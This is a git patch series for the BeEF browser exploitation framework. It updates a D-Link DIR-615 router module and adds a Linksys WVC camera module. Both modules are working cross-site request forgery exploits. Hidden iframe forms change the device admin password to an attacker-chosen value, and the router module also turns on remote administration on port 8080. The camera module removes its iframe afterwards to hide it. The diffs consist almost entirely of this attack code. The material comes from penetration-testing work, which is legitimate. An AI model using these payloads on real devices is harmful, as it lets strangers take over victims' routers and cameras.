From 40f71455318c6c0031c118e31cd713eef2363ac1 Mon Sep 17 00:00:00 2001 From: bcoles Date: Sun, 15 Jul 2012 19:01:09 +0930 Subject: [PATCH 1/2] Updated D-Link DIR-615 router module --- .../command.js | 19 ++++++++++--------- .../config.yaml | 4 ++-- .../module.rb | 5 +++-- 3 files changed, 15 insertions(+), 13 deletions(-) rename modules/exploits/router/{dlink_dir_615_wipe_passwd => dlink_dir_615_csrf}/command.js (60%) rename modules/exploits/router/{dlink_dir_615_wipe_passwd => dlink_dir_615_csrf}/config.yaml (81%) rename modules/exploits/router/{dlink_dir_615_wipe_passwd => dlink_dir_615_csrf}/module.rb (83%) diff --git a/modules/exploits/router/dlink_dir_615_wipe_passwd/command.js b/modules/exploits/router/dlink_dir_615_csrf/command.js similarity index 60% rename from modules/exploits/router/dlink_dir_615_wipe_passwd/command.js rename to modules/exploits/router/dlink_dir_615_csrf/command.js index 2dc496f3a..e7cad9472 100644 --- a/modules/exploits/router/dlink_dir_615_wipe_passwd/command.js +++ b/modules/exploits/router/dlink_dir_615_csrf/command.js @@ -15,17 +15,18 @@ // beef.execute(function() { var gateway = '<%= @base %>'; + var passwd = '<%= @password %>'; var dir615_iframe = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST", - [{'type':'hidden', 'name':'ACTION_POST', 'value':'1'} , - {'type':'hidden', 'name':'apply', 'value':'Save Settings'}, - {'type':'hidden', 'name':'admin_name', 'value':'admin'}, - {'type':'hidden', 'name':'admin_password1', 'value':''}, - {'type':'hidden', 'name':'admin_password2', 'value':''}, - {'type':'hidden', 'name':'rt_enable', 'value':'on'}, - {'type':'hidden', 'name':'rt_enable_h', 'value':'1'}, - {'type':'hidden', 'name':'rt_ipaddr', 'value':'0.0.0.0'}, - {'type':'hidden', 'name':'rt_port', 'value':'8080'} + [{'type':'hidden', 'name':'ACTION_POST', 'value':'1'} , + {'type':'hidden', 'name':'apply', 'value':'Save Settings'}, + {'type':'hidden', 'name':'admin_name', 'value':'admin'}, + {'type':'hidden', 'name':'admin_password1', 'value':passwd}, + {'type':'hidden', 'name':'admin_password2', 'value':passwd}, + {'type':'hidden', 'name':'rt_enable', 'value':'on'}, + {'type':'hidden', 'name':'rt_enable_h', 'value':'1'}, + {'type':'hidden', 'name':'rt_ipaddr', 'value':'0.0.0.0'}, + {'type':'hidden', 'name':'rt_port', 'value':'8080'} ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); diff --git a/modules/exploits/router/dlink_dir_615_wipe_passwd/config.yaml b/modules/exploits/router/dlink_dir_615_csrf/config.yaml similarity index 81% rename from modules/exploits/router/dlink_dir_615_wipe_passwd/config.yaml rename to modules/exploits/router/dlink_dir_615_csrf/config.yaml index e1e22073f..7c1ea2e30 100644 --- a/modules/exploits/router/dlink_dir_615_wipe_passwd/config.yaml +++ b/modules/exploits/router/dlink_dir_615_csrf/config.yaml @@ -15,11 +15,11 @@ # beef: module: - dlink_dir_615_wipe_passwd: + dlink_dir_615_csrf: enable: true category: ["Exploits", "Router"] name: "D-Link DIR-615 Password Wipe" - description: "Attempts to wipe the password of the admin user on a D-Link DIR-615 router. Enable also remote administration on 0.0.0.0:8080" + description: "Attempts to enable remote administration on port 8080 and change the admin password on a D-Link DIR-615 router." authors: ["antisnatchor", "n0x00"] target: working: ["ALL"] diff --git a/modules/exploits/router/dlink_dir_615_wipe_passwd/module.rb b/modules/exploits/router/dlink_dir_615_csrf/module.rb similarity index 83% rename from modules/exploits/router/dlink_dir_615_wipe_passwd/module.rb rename to modules/exploits/router/dlink_dir_615_csrf/module.rb index 5d737de2e..f9a62e534 100644 --- a/modules/exploits/router/dlink_dir_615_wipe_passwd/module.rb +++ b/modules/exploits/router/dlink_dir_615_csrf/module.rb @@ -13,11 +13,12 @@ # See the License for the specific language governing permissions and # limitations under the License. # -class Dlink_dir_615_wipe_passwd < BeEF::Core::Command +class Dlink_dir_615_csrf < BeEF::Core::Command def self.options return [ - {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.1/'} + {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.1/'}, + {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'} ] end From 7f0026fc794a9bce0c47bf56ffb2e49e244308e0 Mon Sep 17 00:00:00 2001 From: bcoles Date: Sun, 15 Jul 2012 19:18:37 +0930 Subject: [PATCH 2/2] Added Linksys WVC series wireless camera CSRF module --- .../command.js | 44 +++++++++++++++++++ .../config.yaml | 25 +++++++++++ .../module.rb | 29 ++++++++++++ 3 files changed, 98 insertions(+) create mode 100644 modules/exploits/camera/linksys_wvc_wireless_camera_csrf/command.js create mode 100644 modules/exploits/camera/linksys_wvc_wireless_camera_csrf/config.yaml create mode 100644 modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb diff --git a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/command.js b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/command.js new file mode 100644 index 000000000..2271f1d33 --- /dev/null +++ b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/command.js @@ -0,0 +1,44 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + var gateway = '<%= @base %>'; + var path = 'adm/file.cgi'; + var passwd = '<%= @password %>'; + + var linksys_wvc_iframe = beef.dom.createIframeXsrfForm(gateway + path, "POST", + [{'type':'hidden', 'name':'adm', 'value':'admin'}, + {'type':'hidden', 'name':'admpw', 'value':passwd}, + {'type':'hidden', 'name':'admpwv', 'value':passwd}, + {'type':'hidden', 'name':'language', 'value':'1'}, + {'type':'hidden', 'name':'h_usernamelist', 'value':''}, + {'type':'hidden', 'name':'h_language', 'value':'1'}, + {'type':'hidden', 'name':'h_lang_from_mac','value':''}, + {'type':'hidden', 'name':'this_file', 'value':'pass_wd.htm'}, + {'type':'hidden', 'name':'next_file', 'value':'pass_wd.htm'}, + {'type':'hidden', 'name':'todo', 'value':'save'}, + {'type':'hidden', 'name':'video_file', 'value':''}, + {'type':'hidden', 'name':'', 'value':'Submit form'} + ]); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(linksys_wvc_iframe); + } + setTimeout("cleanup()", 15000); + +}); + diff --git a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/config.yaml b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/config.yaml new file mode 100644 index 000000000..2bc3a6bfc --- /dev/null +++ b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + linksys_wvc_wireless_camera_csrf: + enable: true + category: ["Exploits", "Camera"] + name: "Linksys WVC series CSRF" + description: "Attempts to change the admin password on a Linksys WVCseries wireless camera." + authors: ["bcoles", "n0x00"] + target: + working: ["ALL"] diff --git a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb new file mode 100644 index 000000000..ffa988308 --- /dev/null +++ b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb @@ -0,0 +1,29 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Linksys_wvc_wireless_camera_csrf < BeEF::Core::Command + + def self.options + return [ + {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.101/'}, + {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end